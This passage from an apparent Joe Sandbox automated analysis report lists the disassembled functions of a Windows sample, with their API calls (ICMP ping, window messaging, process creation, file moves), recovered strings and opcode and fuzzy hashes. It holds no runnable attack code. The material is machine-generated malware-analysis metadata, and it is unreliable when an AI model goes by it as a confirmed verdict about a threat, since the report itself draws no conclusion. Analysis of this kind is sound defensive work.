                                                                                        • IcmpCreateFile.IPHLPAPI ref: 004757F2
                                                                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00475862
                                                                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00475878
                                                                                        • IcmpCloseHandle.IPHLPAPI(00000000), ref: 004758ED
                                                                                        • WSACleanup.WSOCK32 ref: 004758F3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                        • String ID: Ping
                                                                                        • API String ID: 1028309954-2246546115
                                                                                        • Opcode ID: 8c1f62a028f67a861641f920bff49acae339ba4ee59605ba5ff9b7a17a6566e8
                                                                                        • Instruction ID: e00705f4e0379358c1930da5d1710ca1d0dba9501fb2cabd0d468b8ffa352f64
                                                                                        • Opcode Fuzzy Hash: 8c1f62a028f67a861641f920bff49acae339ba4ee59605ba5ff9b7a17a6566e8
                                                                                        • Instruction Fuzzy Hash: 08519F716006009FD710AF25DC45B6A77E4EF48714F05892EF95AEB3A1DB78EC14CB4A
                                                                                        Function 0046B4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0046B4D0
                                                                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0046B546
                                                                                        • GetLastError.KERNEL32 ref: 0046B550
                                                                                        • SetErrorMode.KERNEL32(00000000,READY), ref: 0046B5BD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Error$Mode$DiskFreeLastSpace
                                                                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                        • API String ID: 4194297153-14809454
                                                                                        • Opcode ID: eccad1696ba090c5711fa55b6348286b496d6d94020a94e73532c489e0c9eeb3
                                                                                        • Instruction ID: 3fb85926d1a8df40b98e85eadc692d0a6e2328ff5e483d9ffe01cb822ebdbf3c
                                                                                        • Opcode Fuzzy Hash: eccad1696ba090c5711fa55b6348286b496d6d94020a94e73532c489e0c9eeb3
                                                                                        • Instruction Fuzzy Hash: 29318675A00205AFCB00EB68C845AEE77B4FF45318F10416BF506D7291EB799E86CB9A
                                                                                        Function 00458F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                          • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                                                        • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00459014
                                                                                        • GetDlgCtrlID.USER32 ref: 0045901F
                                                                                        • GetParent.USER32 ref: 0045903B
                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 0045903E
                                                                                        • GetDlgCtrlID.USER32(?), ref: 00459047
                                                                                        • GetParent.USER32(?), ref: 00459063
                                                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00459066
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 1536045017-1403004172
                                                                                        • Opcode ID: 70b00899020a6935ed5be547ea879312aebc4391e40c277213c8505d4346909e
                                                                                        • Instruction ID: 6714b25adca5f569a88cfbaafbe7bd2dd1ba81f724cd7e2599907f028ed7346a
                                                                                        • Opcode Fuzzy Hash: 70b00899020a6935ed5be547ea879312aebc4391e40c277213c8505d4346909e
                                                                                        • Instruction Fuzzy Hash: D021D870A00108BFDF04ABA1CC85EFEB774EF45310F10062AF911672E2DB795819DB28
                                                                                        Function 0045907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                          • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                                                        • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 004590FD
                                                                                        • GetDlgCtrlID.USER32 ref: 00459108
                                                                                        • GetParent.USER32 ref: 00459124
                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00459127
                                                                                        • GetDlgCtrlID.USER32(?), ref: 00459130
                                                                                        • GetParent.USER32(?), ref: 0045914C
                                                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 0045914F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 1536045017-1403004172
                                                                                        • Opcode ID: 76c298384857a0c05b8993852c86e7b1b6c4ac97cbcf8f08457efd25aebf9e7b
                                                                                        • Instruction ID: 4d8cd3b83cca1d69534b37f7086261ba2dc9307f4c099413b547fbd15d3c7d68
                                                                                        • Opcode Fuzzy Hash: 76c298384857a0c05b8993852c86e7b1b6c4ac97cbcf8f08457efd25aebf9e7b
                                                                                        • Instruction Fuzzy Hash: AA21B674A00108BFDF01ABA5CC85EFEBB74EF44301F50452BB911A72A2DB795819DB29
                                                                                        Function 00459163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetParent.USER32 ref: 0045916F
                                                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 00459184
                                                                                        • _wcscmp.LIBCMT ref: 00459196
                                                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00459211
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClassMessageNameParentSend_wcscmp
                                                                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                        • API String ID: 1704125052-3381328864
                                                                                        • Opcode ID: ea2da3042022fb33e5a84bdcfd4780e66fcf499551f9b63f672fb9db9d77b33f
                                                                                        • Instruction ID: f102ea4107ca07b1db40aa5d7e68bb0b9a0f71bc8f584d68d6a8224326f4a83e
                                                                                        • Opcode Fuzzy Hash: ea2da3042022fb33e5a84bdcfd4780e66fcf499551f9b63f672fb9db9d77b33f
                                                                                        • Instruction Fuzzy Hash: 3111E776248317F9FA112624EC06DAB379CAB15721F30046BFD00E40D2FEA95C56666C
                                                                                        Function 004611CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 004611F0
                                                                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00460268,?,00000001), ref: 00461204
                                                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 0046120B
                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 0046121A
                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 0046122C
                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 00461245
                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 00461257
                                                                                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 0046129C
                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 004612B1
                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 004612BC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                        • String ID:
                                                                                        • API String ID: 2156557900-0
                                                                                        • Opcode ID: 2caf1bd63dccf00636a063d85e3956ee9e2a291adaf0d7952c1a55c89920e2b2
                                                                                        • Instruction ID: 1e48a1bdefc3aaf7905b324a82868e76ea33fb60fcd143e126220ea2d996acdd
                                                                                        • Opcode Fuzzy Hash: 2caf1bd63dccf00636a063d85e3956ee9e2a291adaf0d7952c1a55c89920e2b2
                                                                                        • Instruction Fuzzy Hash: 2B31D275600208BFDB109F54EC98F6A37A9EF54315F1582BEFA00E62B0E7789D448B5E
                                                                                        Function 00479113 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 263COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$ClearInit$_memset
                                                                                        • String ID: ,,I$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                        • API String ID: 2862541840-2080382077
                                                                                        • Opcode ID: 5e45a4bc97ccb967f3a94fe0c7eba0d1116f12234079cc91aabcb7686965c87b
                                                                                        • Instruction ID: ae80b45066e4f78fbd037e562a23a34cf658a5e22d7790f01f39a3ab0041c2b1
                                                                                        • Opcode Fuzzy Hash: 5e45a4bc97ccb967f3a94fe0c7eba0d1116f12234079cc91aabcb7686965c87b
                                                                                        • Instruction Fuzzy Hash: 62919E30A00205ABDF20DFA1C848FEFB7B8EF49714F10855EE909AB281D7789D05CBA4
                                                                                        Function 0045A068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • EnumChildWindows.USER32(?,0045A439), ref: 0045A377
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: ChildEnumWindows
                                                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                        • API String ID: 3555792229-1603158881
                                                                                        • Opcode ID: 1424eacf5de64af2c769219169cfdcdf02d038a0872950fffdd1f519614ed5ca
                                                                                        • Instruction ID: 7454df241f77d0b93e78cd2df6a08ba454d4c5e8e9c0a671585cc9aba64ec447
                                                                                        • Opcode Fuzzy Hash: 1424eacf5de64af2c769219169cfdcdf02d038a0872950fffdd1f519614ed5ca
                                                                                        • Instruction Fuzzy Hash: BA91BB70600505AADB08DF61C452BEEF774BF04305F54822FEC59A7242DB3969ADCB99
                                                                                        Function 00402E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetWindowLongW.USER32(?,000000EB), ref: 00402EAE
                                                                                          • Part of subcall function 00401DB3: GetClientRect.USER32(?,?), ref: 00401DDC
                                                                                          • Part of subcall function 00401DB3: GetWindowRect.USER32(?,?), ref: 00401E1D
                                                                                          • Part of subcall function 00401DB3: ScreenToClient.USER32(?,?), ref: 00401E45
                                                                                        • GetDC.USER32 ref: 0043CD32
                                                                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0043CD45
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0043CD53
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0043CD68
                                                                                        • ReleaseDC.USER32(?,00000000), ref: 0043CD70
                                                                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0043CDFB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                        • String ID: U
                                                                                        • API String ID: 4009187628-3372436214
                                                                                        • Opcode ID: 3cdb49cb97ee06b786ec44539fc98b371f27cf3cd913876941f0ba4c68568fc2
                                                                                        • Instruction ID: a06c30b2c7428a2a0e02ce49fef1101dc5652c1e0a779c9989b3b0b616dc9c80
                                                                                        • Opcode Fuzzy Hash: 3cdb49cb97ee06b786ec44539fc98b371f27cf3cd913876941f0ba4c68568fc2
                                                                                        • Instruction Fuzzy Hash: 8A71CB31400205DFCF219F64C884AAB3BB5FF48324F14567BFD55AA2A6C7389881DBA9
                                                                                        Function 00478C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0048F910), ref: 00478D28
                                                                                        • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0048F910), ref: 00478D5C
                                                                                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00478ED6
                                                                                        • SysFreeString.OLEAUT32(?), ref: 00478F00
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                        • String ID:
                                                                                        • API String ID: 560350794-0
                                                                                        • Opcode ID: e599abc5ccc1fcc2afa0811a74523479773a4e2d78cc03c258ebc6d435cce25a
                                                                                        • Instruction ID: 5de9ffb64ca5e15a2b50b30bc9937a924b2564530b5861c8322637ebb6f06415
                                                                                        • Opcode Fuzzy Hash: e599abc5ccc1fcc2afa0811a74523479773a4e2d78cc03c258ebc6d435cce25a
                                                                                        • Instruction Fuzzy Hash: A4F12871A00109AFCB14DF94C888EEEB7B9FF49314F10846AF909AB251DB35AE46CB55
                                                                                        Function 0047F694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 0047F6B5
                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0047F848
                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0047F86C
                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0047F8AC
                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0047F8CE
                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0047FA4A
                                                                                        • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0047FA7C
                                                                                        • CloseHandle.KERNEL32(?), ref: 0047FAAB
                                                                                        • CloseHandle.KERNEL32(?), ref: 0047FB22
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                        • String ID:
                                                                                        • API String ID: 4090791747-0
                                                                                        • Opcode ID: b61b5092976dc11b3ed5dc071c2aa5c938d2e0620ac829c290ec03e61a2ac541
                                                                                        • Instruction ID: 06b6fb47819207378a011b81351d7d70f99dbcb89b467e7706fbe8a6ff9703be
                                                                                        • Opcode Fuzzy Hash: b61b5092976dc11b3ed5dc071c2aa5c938d2e0620ac829c290ec03e61a2ac541
                                                                                        • Instruction Fuzzy Hash: D8E194716042009FC714EF25C451BAA7BE1BF85314F14856EF8999B3A2DB38EC49CB5A
                                                                                        Function 00464CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00463697,?), ref: 0046468B
                                                                                          • Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00463697,?), ref: 004646A4
                                                                                          • Part of subcall function 00464A31: GetFileAttributesW.KERNEL32(?,0046370B), ref: 00464A32
                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00464D40
                                                                                        • _wcscmp.LIBCMT ref: 00464D5A
                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00464D75
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                        • String ID:
                                                                                        • API String ID: 793581249-0
                                                                                        • Opcode ID: 9f483328b87e2f9089392b2207326b9a11b8e00c1f4561b81bc0a43578ca8f4b
                                                                                        • Instruction ID: 3e0d64ecfe06201b2d7f4e4ce82b19db3d94e317acadfd9fd6841a38a6d3c077
                                                                                        • Opcode Fuzzy Hash: 9f483328b87e2f9089392b2207326b9a11b8e00c1f4561b81bc0a43578ca8f4b
                                                                                        • Instruction Fuzzy Hash: 1D5164B25083459BCB24EFA1D8819DF73ECAF84354F40092FB289D3151EE79A589C76B
                                                                                        Function 00488645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 004886FF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
